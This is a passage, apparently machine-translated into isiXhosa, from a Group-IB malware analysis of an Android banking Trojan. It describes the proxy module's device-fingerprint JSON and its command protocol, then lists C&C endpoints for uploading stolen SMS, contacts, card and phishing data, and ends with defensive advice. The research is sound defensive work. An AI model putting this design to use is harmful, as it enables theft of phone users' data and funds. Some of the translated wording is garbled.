4. Iqhagamshela kwi ProxyConfigClass.host: I-ProxyConfigClass.commandPort kwaye ithumela idata malunga nesixhobo esosulelekileyo apho kwifomati ye-JSON:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Kuphi:
- id – isazisi, sizama ukufumana ixabiso ngo “id” umhlaba osuka kwiFared Preference file enegama elithi “x”. Ukuba eli xabiso alikwazanga kufunyanwa, livelisa elinye elitsha. Ngaloo ndlela, imodyuli yeProxy ine-identifier yayo, eyenziwa ngokufanayo kwi-ID yeBot.
- imei — IMEI yesixhobo. Ukuba impazamo yenzekile ngexesha lenkqubo yokufumana ixabiso, umyalezo obhaliweyo wempazamo uya kubhalwa endaweni yalo mhlaba.
- imsi — International Mobile Subscriber Identity of the device. Ukuba impazamo yenzekile ngexesha lenkqubo yokufumana ixabiso, umyalezo obhaliweyo wempazamo uya kubhalwa endaweni yalo mhlaba.
- imodeli - Igama elibonakalayo lomsebenzisi wokugqibela lemveliso.
- umenzi — Umenzi wemveliso/i-hardware (Yakha.MANUFACTURER).
- androidVersion - umtya ngendlela "<%release_version%> (<%os_version%>),<%sdk_version%>"
- ilizwe — indawo yangoku yesixhobo.
- partnerId ngumtya ongenanto.
- packageName – igama lomphako.
- networkType — uhlobo loqhagamshelwano lwangoku lwenethiwekhi (umzekelo: “WIFI”, “MOBILE”). Kwimeko yempazamo, ibuyisela i-null.
- hasGsmSupport – yinyaniso – ukuba ifowuni ixhasa i-GSM, kungenjalo bubuxoki.
- simReady – SIM khadi imo.
- simCountry - ikhowudi yelizwe ye-ISO (esekelwe kumboneleli wekhadi leSIM).
- Umsebenzisi womnatha — igama lomsebenzisi. Ukuba impazamo yenzekile ngexesha lenkqubo yokufumana ixabiso, umyalezo obhaliweyo wempazamo uya kubhalwa endaweni yalo mhlaba.
- simOperator — Igama loMboneleli weNkonzo (SPN). Ukuba kwenzeke impazamo ngexesha lenkqubo yokufumana ixabiso, umyalezo obhaliweyo wempazamo uya kubhalwa endaweni yalo mhlaba.
- inguqulo - le ntsimi igcinwe kwiklasi yoqwalaselo;
5. Itshintshela kwindlela yokulinda imiyalelo evela kumncedisi. Imiyalelo evela kumncedisi iza ngohlobo:
- 0 offset - umyalelo
- 1 offset – sessionId
- I-2 offset - ubude
- I-4 offset - idatha
Xa umyalelo ufika, isicelo singena:
i-MainLog("Umbhalo Wesihloko { sessionId<%id%>], uhlobo[<%command%>], ubude[<%length%>] }")
Le miyalelo ilandelayo esuka kumncedisi inokwenzeka:
| igama | umyalelo | Iinkcukacha | inkcazelo |
|---|---|---|---|
| uxhumanoId | 0 | I-ID yoQhagamshelwano | Yenza uqhagamshelwano olutsha |
| SLEEP | 3 | ixesha | Misa imodyuli yoMmeli |
| IPING PONG | 4 | - | Thumela umyalezo wePONG |
Umyalezo we-PONG uneebhayithi ezi-4 kwaye ujongeka ngolu hlobo: 0x04000000.
Xa umyalelo weID yoqhagamshelwano ufunyenwe (ukwenza uxhulumaniso olutsha) UQhagamshelwano lomyalelo yenza umzekelo weklasi uQhagamshelwano lommeleli.
- Iiklasi ezimbini zithatha inxaxheba kummeli: uQhagamshelwano lommeleli и isiphelo. Xa udala iklasi uQhagamshelwano lommeleli Ukuqhagamshela kwidilesi ProxyConfigClass.host: I-ProxyConfigClass.proxyPort kwaye ugqithise into ye-JSON:
{
"id":<%connectionId%>
}Ukuphendula, umncedisi uthumela umyalezo we-SOCKS5 oqulethe idilesi yeseva ekude apho uqhagamshelwano kufuneka lusekwe. Ukusebenzisana nalo mncedisi kwenzeka ngeklasi isiphelo. Ukuseta umdibaniso unokumelwa ngokucwangcisekileyo ngolu hlobo lulandelayo:
Unxibelelwano lwenethiwekhi
Ukuthintela uhlalutyo lwe-traffic ngabahlaseli benethiwekhi, ukusebenzisana phakathi komncedisi we-CnC kunye nesicelo kunokukhuselwa usebenzisa i-SSL protocol. Yonke idatha ethunyelweyo zombini ukusuka kunye ukuya kwiseva iboniswe ngefomathi ye-JSON. Isicelo senza ezi zicelo zilandelayo ngexesha lokusebenza:
- http://<%CnC%>/api/v1/set_state.php — isiphumo sokwenziwa komyalelo.
- http://<%CnC%>/api/v1/get.php — ukufumana umyalelo.
- http://<%CnC%>/api/v1/load_sms.php — ukukhuphela imiyalezo yeSMS kwisixhobo esosulelekileyo.
- http://<%CnC%>/api/v1/load_ab.php — ukufaka uluhlu lwabafowunelwa kwisixhobo esosulelekileyo.
- http://<%CnC%>/api/v1/aevents.php – isicelo senziwa xa kuhlaziywa iiparamitha ezibekwe kwifayile ekhethiweyo.
- http://<%CnC%>/api/v1/set_card.php -ukufaka idatha efunyenwe kusetyenziswa ifestile yokukhohlisa izenza iMarike kaGoogle yokudlala.
- http://<%CnC%>/api/v1/logs.php -ukulayisha idatha yelog.
- http://<%CnC%>/api/v1/records.php -ukufakwa kwedatha efunyenwe ngeefestile zephishing.
- http://<%CnC%>/api/v1/set_error.php – isaziso sempazamo eyenzekileyo.
Iingcebiso
Ukuze ukhusele abathengi babo kwisoyikiso seTrojans ezihambahambayo, iinkampani kufuneka zisebenzise izisombululo ezibanzi ezivumela ukuba zibeke iliso kwaye zithintele umsebenzi onobungozi ngaphandle kokufaka isoftware eyongezelelweyo kwizixhobo zomsebenzisi.
Ukwenza oku, iindlela zokutyikitya zokufumana iiTrojans ezihambayo kufuneka ziqiniswe ngetekhnoloji yokuhlalutya indlela yokuziphatha komxhasi kunye nesicelo ngokwaso. Ukhuseleko kufuneka lubandakanye umsebenzi wokuchonga isixhobo usebenzisa iteknoloji yeminwe yedijithali, eya kwenza kube lula ukuqonda xa i-akhawunti isetyenziswa kwisixhobo esingaqhelekanga kwaye sele iwele kwizandla zomkhohlisi.
Eyona ngongoma ibalulekileyo kukufumaneka uhlalutyo cross-channel, nto leyo evumela iinkampani ukulawula imingcipheko evela kuphela kwi-Intanethi, kodwa nakwijelo mobile, umzekelo, kwizicelo zebhanki mobile, for transactions nge cryptocurrencies kunye nabaphi na abanye apho. utshintshiselwano lunokwenziwa.
Imigaqo yokhuseleko kubasebenzisi:
- musa ukufaka izicelo zesixhobo esiphathwayo nge-Android OS kuyo nayiphi na imithombo ngaphandle kweGoogle Play, nikela ingqalelo ekhethekileyo kumalungelo acelwe sisicelo;
- faka rhoqo uhlaziyo lwe-Android OS;
- nikela ingqalelo kwizandiso zeefayile ezikhutshelweyo;
- musa ukutyelela izixhobo ezikrokrisayo;
- Musa ukucofa amakhonkco afunyenwe kwimiyalezo yeSMS.
Ukudlala Semyon Rogacheva, ingcali encinci kuphando lwe-malware kwi-Group-IB Computer Forensics Laboratory.
umthombo: www.habr.com